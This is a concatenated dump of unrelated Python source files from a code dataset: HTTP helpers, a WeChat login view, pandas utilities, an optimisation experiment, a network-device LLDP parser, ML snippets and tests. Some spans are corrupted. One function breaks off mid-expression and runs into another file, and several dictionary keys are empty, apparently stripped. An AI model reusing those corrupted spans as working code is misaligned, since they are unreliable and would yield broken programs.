''.join[('{}: {}\\r\\n'.format(k, v)\n for k, v in headers.items())]\n return header\n\n\ndef redirect(location):\n headers = {\n 'Content-type': 'text/html',\n }\n # 直接赋值pycharm警告\n headers.update({\n 'Location': location\n })\n # 301 永久重定向 302 普通定向\n # 302 状态码的含义, Location 的作用\n header = response_with_headers(headers, 302)\n r = header + '\\r\\n' + ''\n return r.encode(encoding='utf-8')\n\n\ndef error(request, code=404):\n \"\"\"\n 根据 code 返回不同的错误响应\n 目前只有 404\n \"\"\"\n e = {\n 404: b'HTTP 1.1 404 NOT FOUND\\r\\n\\r\\n

    404 NOT FOUND

    '\n }\n return e.get(code, b'')\n\n\ndef http_response(body, headers=None):\n \"\"\"\n headers 是可选的字典格式的 HTTP 头\n \"\"\"\n header = 'HTTP/1.1 200 OK\\r\\nContent-Type: text/html\\r\\n'\n if headers is not None:\n header += ''.join(['{}: {}'.format(k, v)\n for k, v in headers.items()])\n r = header + '\\r\\n' + body\n return r.encode(encoding='utf-8')\n\n\n\n\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"618597124","text":"import math\n\ndef readContentFromFile(filename):\n\ttry:\n\t\tif type(filename)==file:\n\t\t\tfileContent=\"\".join(filename.readlines())\n\t\t\treturn fileContent\n\t\telif type(filename)==str:\n\t\t\tfH=open(filename, \"rb\")\n\t\t\tfileContent=\"\".join(fH.readlines())\n\t\t\tfH.close()\n\t\t\treturn fileContent\n\t\telse:\n\t\t\treturn None\n\t\t# End if\n\texcept:\n\t\treturn None\n\t# End try/except\n# End def\n\ndef convertSourceToColors(sourceContent, partsCount=3, oneLine=False):\n\ttry:\n\t\trtn=[]\n\n\t\tfor mainPartCounter in range(0, math.trunc(math.ceil(len(sourceContent)/(partsCount+0.0)))):\n\t\t\tsourceParts=sourceContent[mainPartCounter*partsCount:mainPartCounter*partsCount+partsCount]\n\n\t\t\tif type(sourceParts)==unicode:\n\t\t\t\tsourceParts=sourceParts.encode('utf8')\n\t\t\t# End if\n\n\t\t\tlenSourceParts=len(sourceParts)\n\n\t\t\tif lenSourceParts str:\n token = cache.get(\"wechat_access_token\")\n if token:\n return token\n url = const.WECHAT_TOKEN[\"get\"].format(\n settings.CORPID, settings.CORPSECRET\n )\n try:\n response = requests.get(url)\n data = response.json()\n except Exception:\n logger.error(format_exc())\n token = data[\"access_token\"]\n expires_in = data[\"expires_in\"]\n cache.set(\"wechat_access_token\", token, expires_in)\n return token\n\n\ndef get_user_identify(\n access_token: str,\n code: str,\n) -> str:\n url = const.WECHAT_USER_IDENTIFY.format(access_token, code)\n try:\n response = requests.get(url)\n data = response.json()\n except Exception:\n logging.error(format_exc())\n if not data[\"errcode\"] == 0:\n return \"\"\n else:\n return data[\"UserId\"]\n\n\ndef get_user_profile(access_token, user_id):\n url = const.WECHAT_USER_PROFILE.format(access_token, user_id)\n try:\n response = requests.get(url)\n data = response.json()\n except Exception:\n logging.error(format_exc())\n if not data[\"errcode\"] == 0:\n return \"\"\n else:\n return data\n\n\n@swagger_tags(\n names=[\n \"get\",\n ],\n tags=[\"wechat\"],\n)\n@action(detail=True)\n@api_view([\"GET\"])\n@permission_classes([AllowAny])\ndef wxlogin(\n request,\n *args,\n **kwargs,\n):\n access_token = get_access_token()\n code = request.GET.get(\"code\")\n if not code:\n return HttpResponseRedirect(\n const.CALL_BACK_URL.format(\n settings.CORPID, urllib.parse.quote(settings.DOMAIN)\n )\n )\n user_id = get_user_identify(access_token, code)\n user_profile = get_user_profile(access_token, user_id)\n if not user_profile:\n return Response(\n status=status.HTTP_401_UNAUTHORIZED, data=\"认证过期,请重新认证!\"\n )\n defaults = {\n field.column: user_profile.get(field.column)\n for field in Employee._meta.fields\n }\n employee, _ = Employee.objects.get_or_create(\n userid=user_id, defaults=defaults\n )\n user, _ = User.objects.get_or_create(\n username=user_id.lower(),\n defaults={\n \"email\": user_profile.get(\"email\"),\n \"employee\": employee,\n },\n )\n if user:\n login(request, user)\n messages.add_message(\n request, messages.SUCCESS, f\"欢迎你 ,{employee.name or user_id}!\"\n )\n else:\n messages.add_message(request, messages.ERROR, \"快速登录失败 ,请使用其他方式!\")\n return HttpResponseRedirect(\"/\")\n","sub_path":"wxapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"323284475","text":"import os\nimport pandas as pd \nimport numpy as np\nfrom keras.preprocessing import text\n\nclass uCsv(object):\n \"\"\"Utility functions for loading training dataset from a CSV file, and to extract\n the X variables and the ground truth y using column labels\"\"\"\n\n def fileExists(filename):\n os.path.exists(filename)\n\n def write(csvFile, npData, separator=\",\"):\n pdData = pd.DataFrame(data=npData)\n pdData.to_csv(csvFile, sep=separator, index=False, header=False)#, index_label=False)\n\n def writePd(csvFile, pdData, separator=\",\"):\n pdData.to_csv(csvFile, sep=separator, index=False, header=True)\n\n def openRead(csvfile, separator=\",\"):\n data = pd.read_csv(csvfile, sep=separator)\n return data\n\n def getXFromColumns(train_ori, columnsToKeep):\n \"\"\"To extract independant variables X\n Input types: pandas dataframe, and list of column labels to keep by removing other columns. Output type: 1 numpy array\"\"\"\n data = uCsv.keepColumns(train_ori, columnsToKeep)\n X = np.array(data.loc[:,:])\n return X\n\n def getXExceptColumns(train_ori, columnsToKeep):\n \"\"\"To extract independant variables X\n Input types: pandas dataframe, and list of column labels to exclude. Output type: 1 numpy array\"\"\"\n data = uCsv.dropColumns(train_ori, columnsToKeep)\n X = np.array(data.loc[:,:])\n return X\n \n def getFlatYFromColumn(train_ori, columnsToKeep):\n \"\"\"To extract dependant variable Y that contains the perfect prediction\n Input types: pandas dataframe, and list of column labels. Output type: 1 numpy array\"\"\"\n if len(columnsToKeep) <= 0:\n return None\n columnToKeep = columnsToKeep[0]\n data = uCsv.keepColumns(train_ori, columnsToKeep)\n y = np.ravel(data.loc[:,:])\n return y\n\n def dropColumns(train_ori, columnsToDrop):\n data = train_ori.drop(columnsToDrop, axis=1)#, \"Fare\"], axis=1)\n return data\n\n def keepColumns(train_ori, columnsToKeep):\n all_columns = train_ori.columns.values.tolist()\n columnsToDrop = uCsv.removeFromListAElementsFoundinListB(all_columns, columnsToKeep)\n data = train_ori.drop(columnsToDrop, axis=1)#, \"Fare\"], axis=1)\n return data\n\n\n def removeFromListAElementsFoundinListB(A, B):\n \"\"\"To ensure list A won't share any elements in common with list B.\n Input types: 2 lists. Output type: 1 list. This function has been optimized for speed.\"\"\"\n # timed tests using:\n #a = range(1,500000)\n #b = range(1,100000)\n \n #1) comprehension method\n #comprehension = [x for x in a if x not in b] # 12.8 sec\n\n #2) filter_function method\n #filter_function = filter(lambda x: x not in b, a) # 12.6 sec\n\n #3) modification method\n copyA = A.copy()\n for x in B: # 0.27 sec\n try:\n copyA.remove(x)\n except ValueError:\n pass\n return copyA\n \n def listFilesWithExtensionsInDirectoryAndSubDirectories(exts, topDir):\n \"\"\"ext: The extension to search for;\n topDir: The top directory\"\"\"\n listCsv = []\n for dirpath, dirnames, files in os.walk(topDir):\n for name in files:\n lowerName = name.lower()\n for ext in exts:\n lowerExt = ext.lower()\n if lowerName.endswith(lowerExt):\n listCsv.append(os.path.join(dirpath, lowerName))\n return listCsv\n\n def listFilesWithExtensionInDirectoryAndSubDirectories(ext, topDir):\n \"\"\"ext: The extension to search for;\n topDir: The top directory\"\"\"\n listCsv = []\n lowerExt = ext.lower()\n for dirpath, dirnames, files in os.walk(topDir):\n for name in files:\n lowerName = name.lower()\n if lowerName.endswith(lowerExt):\n listCsv.append(os.path.join(dirpath, lowerName))\n return listCsv\n\n def listFilesWithExtButWithoutOtherExtsInDirectoryAndSubDirectories(extToInclude, extsToExclude, topDir):\n \"\"\"extToInclude: The extension to search for, ex: file1.csv;\n extsToExclude: Similar extensions we don't want, ex: file1.predicted.csv;\n topDir: The top directory\"\"\"\n list1 = uCsv.listFilesWithExtensionInDirectoryAndSubDirectories(extToInclude, topDir)\n list2 = uCsv.listFilesWithExtensionsInDirectoryAndSubDirectories(extsToExclude, topDir)\n list3 = uCsv.removeFromListAElementsFoundinListB(list1, list2)\n return list3\n\n def listFilesWithExtButWithoutAnotherExtInDirectoryAndSubDirectories(extToInclude, extToExclude, topDir):\n \"\"\"extToInclude: The extension to search for, ex: file1.csv;\n extToExclude: A similar extension we don't want, ex: file1.predicted.csv;\n topDir: The top directory\"\"\"\n list1 = uCsv.listFilesWithExtensionInDirectoryAndSubDirectories(extToInclude, topDir)\n list2 = uCsv.listFilesWithExtensionInDirectoryAndSubDirectories(extToExclude, topDir)\n list3 = uCsv.removeFromListAElementsFoundinListB(list1, list2)\n return list3\n \n def stackPandasRows(pdAccumulateArray, pdNewRows):\n \"\"\"Generic function that can be called repeatedly to vertically stack more and more rows to a table.\n The pre-initialize the pdAccumulateArray to an empty array = [].\"\"\"\n if pdAccumulateArray is None:\n pdAccumulateArray = []\n length = len(pdAccumulateArray)\n if length <= 0:\n pdAccumulateArray = pdNewRows\n else:\n pdAccumulateArray = pd.concat([pdAccumulateArray, pdNewRows], axis=0)\n return pdAccumulateArray\n\n def stackNumpyRows(npAccumulateArray, npNewRows):\n \"\"\"Generic function that can be called repeatedly to vertically stack more and more rows to a table.\n The pre-initialize the npAccumulateArray to an empty array = [].\"\"\"\n if npAccumulateArray is None:\n npAccumulateArray = []\n length = len(npAccumulateArray)\n if length <= 0:\n npAccumulateArray = npNewRows\n else:\n npAccumulateArray = np.concatenate((npAccumulateArray, npNewRows), axis=0)\n return npAccumulateArray\n\n def haveSameNbOfRows(pdArray1, pdArray2):\n \"\"\"Check if 2 pandas dataframes have the same number of rows\"\"\"\n if pdArray1 is None or pdArray2 is None:\n return False\n return pdArray1.shape[0] == pdArray2.shape[0]\n\n def isValidArray(array):\n if array is None:\n return False\n elif len(array) <= 0:\n return False\n return True\n\n","sub_path":"Andy/uCsv.py","file_name":"uCsv.py","file_ext":"py","file_size_in_byte":6707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"170445866","text":"#!/usr/bin/env python -W ignore::DeprecationWarning\n\n# Project 2: Randomized Optimization -- GT CS7641 Machine Learning, Fall 2019\n# Eric W. Wallace, ewallace8-at-gatech-dot-edu, GTID 903105196\n\nimport mlrose\nimport os\nimport pandas as pd\nimport time\n\nEXPERIMENT_NAME = \"TSP_RHC\"\nOUTPUT_DIRECTORY = 'experiments'\nSEED = 1\n\n# Traveling Salesman Problem: spiral within a 6x6 grid, best (lowest) fitness score is ~34.6\ncoords_list = [(0, 0), (1, 0), (2, 0), (3, 0), (4, 0), (5, 0), (6, 0),\n (6, 1), (6, 2), (6, 3), (6, 4), (6, 5), (6, 6),\n (5, 6), (4, 6), (3, 6), (2, 6), (1, 6), (0, 6),\n (0, 5), (0, 4), (0, 3), (0, 2),\n (1, 2), (2, 2), (3, 2), (4, 2),\n (4, 3), (4, 4), (3, 4), (2, 4), (2, 3)]\nfitness = mlrose.TravellingSales(coords=coords_list)\nproblem = mlrose.TSPOpt(length=len(coords_list), fitness_fn=fitness, maximize=False)\nperfect_score = 34.60555127546399\n\n# prep dataset\nlabels = ['problem', 'max_attempts', 'max_iters', 'restarts',\n 'run_time', 'best_fitness', 'stopped_at', 'func_calls']\nresults_list = []\n\n# leave these variable static for RHC\niterations = 20000\n\n# run RHC over varying options\nhalt_loop = False\n# run 1:\n# for attempts in (25, 50, 75, 100, 125, 150):\n# \tfor restarts in (0, 25, 50, 75, 100, 125, 150):\n# run 2:\n# for attempts in (150, 300):\n# \tfor restarts in (125,):\n# run 3:\n# for attempts in (500,):\n# \tfor restarts in (125,):\n# run 4:\nfor attempts in (750,):\n\tfor restarts in (125,):\n\t\tstart_time = time.perf_counter()\n\t\t(_, best_fitness, curve) = mlrose.random_hill_climb(problem,\n\t\t max_attempts=attempts,\n\t\t max_iters=iterations,\n\t\t restarts=restarts,\n\t\t curve=True,\n\t\t random_state=SEED)\n\t\trun_time = time.perf_counter() - start_time\n\t\tstopped_at = curve.size\n\t\tfunc_calls = problem.get_function_calls()\n\t\tproblem.reset_function_calls() # don't forget to reset before the next run\n\t\tresults_list.append((EXPERIMENT_NAME, attempts, iterations, restarts,\n\t\t run_time, best_fitness, stopped_at, func_calls))\n\t\tif best_fitness == perfect_score:\n\t\t\thalt_loop = True\n\t\t\tbreak\n\tif halt_loop:\n\t\tbreak\n\n# compile & save results\ndf_results = pd.DataFrame.from_records(results_list, columns=labels)\ndf_results.to_excel(os.path.join(OUTPUT_DIRECTORY, EXPERIMENT_NAME + '.xlsx'))\ndf_results.to_pickle(os.path.join(OUTPUT_DIRECTORY, EXPERIMENT_NAME + '.pickle'))\n\n# minimal output\nprint(\"# Best Run:\")\nprint(df_results.loc[df_results['best_fitness'].idxmin()])\n","sub_path":"rhc_tsp.py","file_name":"rhc_tsp.py","file_ext":"py","file_size_in_byte":2740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"442549144","text":"# -*- coding: utf-8 -*-\n##----------------------------------------------------------------------\n## Zyxel.ZyNOS.get_lldp_neighbors\n##----------------------------------------------------------------------\n## Copyright (C) 2007-2013 The NOC Project\n## See LICENSE for details\n##----------------------------------------------------------------------\n\n#NOC modules\nfrom noc.sa.script import Script as NOCScript\nfrom noc.sa.interfaces import IGetLLDPNeighbors\nfrom noc.lib.validators import is_int, is_ipv4\n#Python standard modules\nimport re\n\n\nclass Script(NOCScript):\n name = \"Zyxel.ZyNOS.get_lldp_neighbors\"\n implements = [IGetLLDPNeighbors]\n\n rx_summary_split = re.compile(r\"^LocalPort.+?\\n\",\n re.MULTILINE | re.IGNORECASE)\n rx_s_line = re.compile(r\"(?P\\d+)\\s+[0-9a-f:]+\\s+.+?$\")\n\n rx_remote_port = re.compile(\"^\\s+Port id:\\s*(?P.+?)\\s*$\",\n re.MULTILINE | re.IGNORECASE)\n\n rx_remote_port_desc = re.compile(\"^Port Description:\\s*(?P.+?)\\s*$\",\n re.MULTILINE | re.IGNORECASE)\n\n rx_remote_port_subtype = re.compile(\"^Port id subtype:\\s*(?P.+?)\\s*$\",\n re.MULTILINE | re.IGNORECASE)\n\n rx_chassis_id = re.compile(r\"^\\s+Chassis id:\\s*(?P\\S+)\",\n re.MULTILINE | re.IGNORECASE)\n\n rx_enabled_caps = re.compile(\"^System Capabilities Enabled:\\s*(?P((other|repeater|bridge|router|wlan-access-point|telephone|docsis-cable-device|station-only)\\s+)+)\\s*$\",\n re.MULTILINE | re.IGNORECASE)\n\n rx_system = re.compile(r\"^\\s+System Name:\\s*(?P\\S+)\",\n re.MULTILINE | re.IGNORECASE)\n\n rx_mac = re.compile(r\"^[0-9a-f]{2}:[0-9a-f]{2}:[0-9a-f]{2}:[0-9a-f]{2}:[0-9a-f]{2}:[0-9a-f]{2}$\")\n\n def execute(self):\n r=[]\n try:\n v = self.cli(\"sh lldp info remote\")\n except self.CLISyntaxError:\n raise self.NotSupportedError()\n\n v = self.rx_summary_split.split(v)[1]\n lldp_interfaces = []\n\n #Get lldp interfaces\n for l in v.splitlines():\n l = l.strip()\n if not l:\n break\n match = self.rx_s_line.match(l)\n if not match:\n continue\n lldp_interfaces += [match.group('local_if')]\n\n #Get lldp neighbors\n for local_if in lldp_interfaces:\n i = {\n \"local_interface\": local_if,\n \"neighbors\": []\n }\n\n #Get neighbor details\n try:\n v = self.cli(\"sh lldp info remote interface port-channel %s\" % local_if)\n except self.CLISyntaxError:\n raise self.NotSupportedError()\n\n #Get remote port\n match = self.re_search(self.rx_remote_port, v)\n remote_port = match.group(\"remote_if\")\n\n match = self.re_search(self.rx_remote_port_subtype, v)\n remote_port_subtype_str = match.group('remote_if_subtype')\n\n #Get remote port subtype from \"Port ID Subtype\" field\n if remote_port_subtype_str == 'local-assigned':\n remote_port_subtype = 7 #Local\n else:\n remote_port_subtype = 5\n if self.rx_mac.match(remote_port):\n # Actually macAddress(3)\n remote_port_subtype = 3\n elif is_ipv4(remote_port):\n # Actually networkAddress(4)\n remote_port_subtype = 4\n elif is_int(remote_port):\n # Actually local(7)\n remote_port_subtype = 7\n n = {\n \"remote_port\": remote_port,\n \"remote_port_subtype\": remote_port_subtype,\n \"remote_chassis_id_subtype\": 4\n }\n\n #Get Chassis ID\n match = self.rx_chassis_id.search(v)\n if not match:\n continue\n n[\"remote_chassis_id\"] = match.group(\"id\")\n\n #Get capabilities\n cap = 0\n match = self.rx_enabled_caps.search(v)\n if match:\n for c in match.group(\"caps\").split():\n c = c.strip()\n if c:\n cap |= {\n \"other\": 1, \"repeater\": 2, \"bridge\": 4,\n \"wlan-access-point\": 8, \"router\": 16, \"telephone\": 32,\n \"docsis-cable-device\": 64, \"station-only\": 128\n }[c]\n n[\"remote_capabilities\"] = cap\n\n #Get system name\n match = self.rx_system.search(v)\n if match:\n n[\"remote_system_name\"] = match.group(\"name\")\n i[\"neighbors\"] += [n]\n r += [i]\n return r\n","sub_path":"sa/profiles/Zyxel/ZyNOS/get_lldp_neighbors.py","file_name":"get_lldp_neighbors.py","file_ext":"py","file_size_in_byte":4781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"25672341","text":"import os\nimport tensorflow as tf\nfrom tensorflow import keras\nimport numpy as np\nimport matplotlib.pyplot as plt\nprint(tf.__version__)\nimdb = keras.datasets.imdb\n(train_data, train_labels), (test_data, test_labels) = imdb.load_data(num_words=10000)\n# num_words = 10000 keeps 10,000 most frequently occurring words; the rest are discarded.\nprint(\"Training entries: {}, Labels: {}\".format(len(train_data), len(train_labels)))\nword_index = imdb.get_word_index()\nword_index = {k:(v+3) for k,v in word_index.items()} \nword_index[\"\"] = 0\nword_index[\"\"] = 1\nword_index[\"\"] = 2 # unknown\nword_index[\"\"] = 3\nreverse_word_index = dict([(value, key) for (key, value) in word_index.items()])\ndef decode_review(text):\n return ' '.join([reverse_word_index.get(i, \"?\") for i in text])\n\ntrain_data = keras.preprocessing.sequence.pad_sequences(train_data,\nvalue = word_index[\"\"],\npadding=\"post\",\nmaxlen=256)\ntest_data = keras.preprocessing.sequence.pad_sequences(test_data,\nvalue = word_index[\"\"],\npadding=\"post\",\nmaxlen=256)\nprint(len(train_labels))","sub_path":"Tensorflow/textClassification.py","file_name":"textClassification.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"141504202","text":"\n# DEFINE GLOBAL VARIABLES IN THIS FILE\n\n'''\n#### IMPORTANT NOTE! -> The current configuration is the same as config128.txt (the 128 x 128 case in the report). \n#### So careful!! Do not train the network again with this configuration or the current weights file (the current model) will be overwritten\n#### If this happens, you can redownload the corresponding weights file again from GitHub\n'''\n\nREPRODUCE_ORIGINAL_RESULTS = 1 # Set this value to 1 in case that you would like to split the dataset exactly as it originally was to test the results in the report\nINPUT_IMAGE_SIZE = 128 # Define input image size (64, 128, 256)\nTEST_SET_IMAGES = 46 # Total number of test set images in data/droneRace/test/original\n\n# Variables for training and testing (making predictions):\nBATCH_SIZE = 2 # Batch size\nEPOCH = 25 # Number of epoch\nVALIDATION_SPLIT = 0.15 # Validation split percentage\nGEN_IMAGE_NUM = 16 # See below\nAUX_TOTAL = GEN_IMAGE_NUM**2 + GEN_IMAGE_NUM # Number of images to be prepared for training\n # Make sure that AUX_TOTAL > (training set + validation set)\nWEIGHTS_HISTORY_SAVE_NAME = 'drone_bs' + str(BATCH_SIZE) + '_ep' + str(EPOCH) + '_im' + str(AUX_TOTAL) + '_size' + str(INPUT_IMAGE_SIZE) # Name for saving wrights and history\nGEN_DATA = 1 # Generate data for training. 1: YES, 0: NO. Better set to 1.\n\n# Variables exclusively for testing:\nSET_THRESHOLD = 0 # 0: Grayscale predictions, 1: Binary predictions\nTHRESHOLD = 0.2 # Define threshold in case that SET_THRESHOLD == 1 for different results \n\n# Postprocessing size for the ROC curves or better visualization\nPOSTPROCESSING_SIZE = 315 # Size of the post_processed image\nPOSTPROCESS_MASK = 1 # 1: Masks are postprocessed, 0: Masks are not post processed (Always set to one the first time you plot a ROC curve)\nPOSTPROCESS_PREDICTIONS = 1 # 1: Predictions are postprocessed, 0: Predictions are not post processed (Always set to one the first time you plot a ROC curve)\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"77978418","text":"with open('C:\\\\Users\\\\jbwang\\\\Desktop\\\\otus_tax_assignments.txt') as f1:\r\n with open('C:\\\\Users\\\\jbwang\\\\Desktop\\\\tax.txt', 'w') as f2:\r\n # f2.write(f1.readline())\r\n for line in f1:\r\n id = line.split('\\t')[0]\r\n tax = line.strip().split('\\t')[1].split(';')\r\n if len(tax) == 7:\r\n f2.write(id + '\\t' + '\\t'.join(tax) + '\\n')\r\n else:\r\n while len(tax) < 7:\r\n tax.append('NA')\r\n newline = id + '\\t' + '\\t'.join(tax)\r\n f2.write(newline + '\\n')\r\n if len(tax) > 7:\r\n print(line)","sub_path":"codefile/tax.py","file_name":"tax.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"39299812","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.datasets import load_iris\nimport pickle\n\n\nclass Model(object):\n def __init__(self):\n self.model = None\n self.X = None\n self.y = None\n \n def load_data(self):\n data = load_iris()\n self.X = data.data\n self.y = data.target\n\n def fit_model(self):\n self.model = RandomForestClassifier()\n self.model.fit(self.X, self.y)\n\n def pickle_model(self, filename):\n with open(filename, 'wb') as f:\n pickle.dump(self.model, f)\n\nif __name__ == '__main__':\n m = Model()\n m.load_data()\n m.fit_model()\n m.pickle_model('model.pkl')\n","sub_path":"solutions/flask/brython_solution/fit_model.py","file_name":"fit_model.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"306037119","text":"# The main object classes\nimport math\nimport random\n\nclass Game:\n def __init__(self):\n self.round = 0\n self.starting_funds = 10\n self.game_on = False\n\n def round_num_patients(self, Patients):\n # Patients is a PatientPool object \n assert isinstance(Patients, PatientPool)\n return Patients.sick_per_round()\n\n def round_buy_GP(self, money_in):\n print(\"Current funds are \", money_in)\n round_spending = self.get_input_int()\n while round_spending > money_in:\n print(\"Insufficient funds. Your current balance is \", money_in)\n round_spending = self.get_input_int()\n print()\n return money_in - round_spending\n\n def get_input_int(self):\n try:\n input_int = int(input(\"How much would you like to spend? \"))\n except:\n raise AssertionError(\"Please input an integer value\")\n return input_int\n \n def run_game(self):\n Patients = PatientPool()\n GPs = GPPool()\n funds = self.starting_funds\n round_n = 0\n num_sick = 0\n\n self.game_on = True\n\n while self.game_on:\n print(\"Round \", round_n)\n num_sick = self.round_num_patients(Patients)\n num_treated = GPs.treated_per_round(num_sick)\n print(\"This month, the number of sick seeking care is \", num_sick)\n print(\"You have \", GPs.num_GPs, \" GP offices available. They managed to treat \", num_treated, \" patients.\")\n\n funds = self.round_buy_GP(funds)\n if funds <= 0:\n self.game_on = False\n round_n +=1\n\n print(\"Your funds are \", funds, \". Game over.\")\n \n\nclass PatientPool:\n def __init__(self, total_population=100000, sickness_ratio=0.01):\n self.total_population = total_population\n self.sickness_ratio = sickness_ratio\n\n def sick_per_round(self):\n return math.floor(self.total_population * self.sickness_ratio * random.random())\n \nclass GPPool:\n def __init__(self, starting_GPs=5, patients_per_round=50, starting_cost=1):\n self.num_GPs = starting_GPs\n self.patients_per_round = patients_per_round\n self.cost_per_GP = starting_cost\n\n def treated_per_round(self, num_sick):\n if num_sick <= (self.num_GPs * self.patients_per_round):\n return 0\n elif num_sick > (self.num_GPs * self.patients_per_round):\n return num_sick - (self.num_GPs * self.patients_per_round)\n else:\n return None\n\n\n","sub_path":"Classes.py","file_name":"Classes.py","file_ext":"py","file_size_in_byte":2557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"425300381","text":"from mangrove.form_model.field import TextField\nfrom mangrove.form_model.form_model import FormModel\nfrom datawinners.entity.entity_export_helper import get_subject_headers, get_submission_headers\nfrom mangrove.bootstrap import initializer\nfrom mangrove.utils.test_utils.mangrove_test_case import MangroveTestCase\n\n\nclass TestExcelHeaders(MangroveTestCase):\n def setUp(self):\n MangroveTestCase.setUp(self)\n initializer.run(self.manager)\n\n\n def _get_header_component(self, headers, parameter):\n header_text = []\n for header in headers:\n self.assertTrue(isinstance(header, tuple))\n self.assertEqual(len(header), 3)\n header_text.append(header[parameter][0])\n return header_text\n\n def test_should_get_header_information_for_subject_excel(self):\n fields = [{\"name\": \"first name\", \"code\": 'q1', \"label\": 'What is your name', \"entity_question_flag\": False,\n \"type\": \"text\"},\n {\"name\": \"age\", \"code\": 'q2', \"label\": 'What is your age', \"type\": \"integer\", \"constraints\": [\n [\n \"range\",\n {\n \"max\": \"15\",\n \"min\": \"12\"\n }\n ]\n ]},\n {\"name\": \"reporting date\", \"code\": 'q3', \"label\": 'What is the reporting date',\n \"date_format\": \"dd.mm.yyyy\", \"type\": \"date\"},\n {\"name\": \"eid\", \"code\": 'eid', \"label\": 'What is the subject id', \"entity_question_flag\": True,\n \"type\": \"text\"},\n {\"name\": \"location\", \"code\": 'q4', \"label\": 'What is the location', \"type\": \"list\"},\n {\"name\": \"choices\", \"code\": 'q5', \"label\": 'Your choices', \"type\": \"select\"}]\n\n headers = get_subject_headers(fields)\n\n headers_text = self._get_header_component(headers, 0)\n self.assertEqual(\n [\"What is your name\", \"What is your age\", \"What is the reporting date\",\n \"What is the subject id\", 'What is the location',\n \"Your choices\"], headers_text)\n\n header_instructions = self._get_header_component(headers, 1)\n self.assertEqual(\n [\"\\nAnswer must be a word\", \"\\nEnter a number between 12-15.\",\n \"\\nAnswer must be a date in the following format: day.month.year\",\n \"\\nAssign a unique ID for each Subject.\", '\\nEnter name of the location.',\n \"\\nEnter 1 or more answers from the list.\"], header_instructions)\n\n header_examples = self._get_header_component(headers, 2)\n self.assertEqual(\n [\"\\n\\n\", \"\\n\\n\", \"\\n\\nExample: 25.12.2011\",\n \"\\n\\nLeave this column blank if you want DataWinners to assign an ID for you.\", '\\n\\nExample: Nairobi',\n \"\\n\\nExample: a or ab\"], header_examples)\n\n def test_should_get_header_information_for_submission_excel(self):\n fields = [{\"name\": \"first name\", \"code\": 'q1', \"label\": 'What is your name', \"entity_question_flag\": False,\n \"type\": \"text\"},\n {\"name\": \"age\", \"code\": 'q2', \"label\": 'What is your age', \"type\": \"integer\", \"constraints\": [\n [\n \"range\",\n {\n \"max\": \"15\",\n \"min\": \"12\"\n }\n ]\n ]},\n {\"name\": \"reporting date\", \"code\": 'q3', \"label\": 'What is the reporting date',\n \"date_format\": \"dd.mm.yyyy\", \"type\": \"date\"},\n {\"name\": \"eid\", \"code\": 'eid', \"label\": 'What is the subject id', \"entity_question_flag\": True,\n \"type\": \"text\"},\n {\"name\": \"choices\", \"code\": 'q5', \"label\": 'Your choices', \"type\": \"select\"}]\n form_model = FormModel(self.manager, name=\"some_name\", entity_type=['test'], form_code=\"cli00_mp\", fields=[], type=\"type1\")\n\n headers = get_submission_headers(fields, form_model)\n\n headers_text = self._get_header_component(headers, 0)\n self.assertEqual(\n [\"What is your name\", \"What is your age\", \"What is the reporting date\",\n \"What is the subject id\",\n \"Your choices\"], headers_text)\n\n header_instructions = self._get_header_component(headers, 1)\n self.assertEqual(\n [\"\\n\\nAnswer must be a word\", \"\\n\\nEnter a number between 12-15.\",\n \"\\n\\nAnswer must be a date in the following format: day.month.year\",\n \"\\n\\nEnter the unique ID for each test.\\nYou can find the test List on the My Subjects page.\",\n \"\\n\\nEnter 1 or more answers from the list.\"], header_instructions)\n\n header_examples = self._get_header_component(headers, 2)\n self.assertEqual(\n [\"\\n\\n\", \"\\n\\n\", \"\\n\\nExample: 25.12.2011\",\n \"\\n\\nExample: cli01\",\n \"\\n\\nExample: a or ab\"], header_examples)\n","sub_path":"datawinners/entity/tests/test_export_helper.py","file_name":"test_export_helper.py","file_ext":"py","file_size_in_byte":5032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"337695001","text":"import numpy as np\ndef heatmap2coor_numpy(hp_preds, n_kps = 7, img_size=(225,225)):\n heatmaps = hp_preds[:,:n_kps]\n flatten_hm = heatmaps.reshape((heatmaps.shape[0], n_kps, -1))\n flat_vectx = hp_preds[:,n_kps:2*n_kps].reshape((heatmaps.shape[0], n_kps, -1))\n flat_vecty = hp_preds[:,2*n_kps:].reshape((heatmaps.shape[0], n_kps, -1))\n flat_max = np.argmax(flatten_hm, axis=-1)\n max_mask = flatten_hm == np.expand_dims(np.max(flatten_hm, axis=-1), axis=-1)\n cxs = flat_max%(heatmaps.shape[-2])\n cys = flat_max//(heatmaps.shape[-2])\n ovxs = np.sum(flat_vectx*max_mask, axis=-1)\n ovys = np.sum(flat_vectx*max_mask, axis=-1)\n xs_p = (cxs*15+ovxs)/img_size[1]\n ys_p = (cys*15+ovys)/img_size[0]\n hp_preds = np.stack([xs_p, ys_p], axis=-1)\n return hp_preds\n\ndef pcks_score(pred, target, pb_type='regression', n_kps=7, img_size=(225,225), id_shouder=(3,5), thresh=0.4, stride=None):\n if pb_type == 'detection' and stride is None:\n raise Exception(\"missing \\'stride\\' param on detection problem\")\n sr = 